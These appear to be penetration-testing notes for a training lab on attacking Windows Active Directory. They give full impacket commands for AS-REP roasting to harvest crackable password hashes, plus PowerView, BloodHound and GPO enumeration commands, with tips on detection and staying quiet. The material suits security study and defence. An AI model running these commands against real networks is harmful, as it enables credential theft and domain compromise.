Windows AD enum notes

Windows AD Enum

AS-REP Roasting (users with "Do not require Kerberos preauthentication" set)

No creds, but we have a list of candidate usernames in users.txt (one per line):

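# AS-REP roast every candidate user without credentials. impacket's GetNPUsers
# accepts the user list directly (-usersfile), so a single run covers the whole
# file; accounts that still require pre-auth are skipped, and the crackable
# AS-REP hashes are written to h1.hash in hashcat format (mode 18200).
# -dc-ip pins the KDC so the probe does not depend on DNS.
# Detection note: every probe is an AS-REQ the DC logs (event 4768, pre-auth
# type 0), so this is not quiet -- keep the list tight.
python3 GetNPUsers.py corp.local/ -usersfile users.txt -dc-ip 10.10.10.1 -no-pass -format hashcat -outputfile h1.hash

# Equivalent one-user-at-a-time loop (hashes go to stdout). `read -r` keeps
# backslashes intact, the quotes protect names with odd characters, and blank
# lines are skipped instead of producing a bogus "corp.local/" target.
while IFS= read -r p; do
  [ -n "$p" ] || continue
  python3 GetNPUsers.py "corp.local/${p}" -dc-ip 10.10.10.1 -no-pass -format hashcat
done < users.txt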

With creds (domain\user:password), e.g. corp\attacker:PASSWORD:

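# With a valid domain account, let GetNPUsers query LDAP for every user that
# has DONT_REQ_PREAUTH set and request (-request) their AS-REP hashes,
# written to h1.hash in hashcat format (mode 18200).
# Uses the FQDN and -dc-ip like the no-creds run above, so Kerberos and LDAP
# go to the same DC. The password is deliberately left off the target string:
# impacket prompts for it, which keeps it out of shell history and `ps`.
# If it must be inline, quote the whole target -- passwords often contain
# shell metacharacters: 'corp.local/attacker:PASSWORD'
python3 GetNPUsers.py corp.local/attacker -dc-ip 10.10.10.1 -request -format hashcat -outputfile h1.hash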

Domain user / ACL enum (PowerView) — what rights do user groups hold:

# ACL enumeration with PowerView. The IdentityReference filter is a
# case-insensitive regex *substring* match, so "users" also catches
# "Domain Users", "Authenticated Users", "RDPUsers", ... -- that breadth is
# the point: any modify/extended right held by such principals is an
# escalation path worth chasing.

# ACEs on every GPO, keeping only principals whose name contains "users"
Get-NetGPO |
  ForEach-Object { Get-ObjectAcl -ResolveGUIDs -Name $_.Name } |
  Where-Object { $_.IdentityReference -match "users" }

# Domain-wide scan for interesting (non-default, modification) ACEs,
# first for any *users* principal, then narrowed to the RDPUsers group
Invoke-ACLScanner -ResolveGUIDs | Where-Object { $_.IdentityReference -match "users" }
Invoke-ACLScanner -ResolveGUIDs | Where-Object { $_.IdentityReference -match "RDPUsers" }

# Same GPO ACE listing, unfiltered, for a full picture
Get-NetGPO | ForEach-Object { Get-ObjectAcl -ResolveGUIDs -Name $_.Name }

# Who holds rights over Domain Admins, and over the object named "users"
Get-ObjectAcl -SamAccountName "Domain Admins" -ResolveGUIDs -Verbose
Get-ObjectAcl -SamAccountName "users" -ResolveGUIDs -Verbose

Forest Enum:

# Trust mapping with PowerView. Start with every domain in the current forest
# and list each one's trusts, then the current domain alone, then the forest
# membership on its own.
Get-NetForestDomain -Verbose | Get-NetDomainTrust
Get-NetDomainTrust
Get-NetForestDomain -Verbose

# External trusts (to domains outside the forest) are the ones to look at
# first -- they are where SID filtering / selective authentication settings
# decide whether the trust is abusable, so check those separately.
Get-NetDomainTrust | Where-Object { $_.TrustType -eq 'External' }

# Same mapping for a named forest, and forest-wide external trusts only
Get-NetForestDomain -Forest eurocorp.local -Verbose | Get-NetDomainTrust
Get-NetForestDomain -Verbose |
  Get-NetDomainTrust |
  Where-Object { $_.TrustType -eq 'External' }

BloodHound

# SharpHound collection. "All" pulls groups, ACLs, trusts, sessions, local
# admins, etc. from every reachable host -- it is the noisiest option
# (touches every machine); use a narrower method such as DCOnly when
# staying quiet matters.
Invoke-BloodHound -CollectionMethod 'All'

# LoggedOn is not part of "All": it enumerates logged-on users per host
# (typically needs local admin on the target), hence the separate run.
Invoke-BloodHound -Verbose -CollectionMethod 'LoggedOn'

GPO Enum

# GPO enumeration with PowerView.
# All GPOs in the domain
Get-NetGPO
# Computers under the UserMachines OU: without -FullData Get-NetOU yields
# ADSPaths, which Get-NetComputer can take directly.
Get-NetOU UserMachines | ForEach-Object { Get-NetComputer -ADSPath $_ }

# Members of the RDPUsers group, then the GPOs that push local group
# membership (Restricted Groups / group policy preferences)
Get-NetGroupMember -GroupName 'RDPUsers'
Get-NetGPOGroup -Verbose

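# Resolve the GPOs linked to an OU. gplink is one string holding one or more
# "[LDAP://cn={GUID},cn=policies,cn=system,DC=...;N]" entries; N is the link
# options flag (0 = enabled and not enforced, 1 = disabled, 2 = enforced).
$gplink = (Get-NetOU StudentMachines -FullData).gplink
$gplink
# sample output:
# [LDAP://cn={3E04167E-C2B6-4A9A-8FB7-C811158DC97C},cn=policies,cn=system,DC=dollarcorp,DC=moneycorp,DC=local;0]

# Extract every linked GPO path from gplink instead of hand-copying the GUID,
# so an OU with several links is covered in one go.
[regex]::Matches($gplink, 'LDAP://[^;]+') |
  ForEach-Object { Get-NetGPO -ADSpath $_.Value }

# Single-GPO form, using the GUID from the sample output above
Get-NetGPO -ADSpath 'LDAP://cn={3E04167E-C2B6-4A9A-8FB7-C811158DC97C},cn=policies,cn=system,DC=dollarcorp,DC=moneycorp,DC=local'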

links:
https://ired.team/
https://gist.github.com/TarlogicSecurity/2f221924fef8c14a1d8e29f3cb5c5c4a
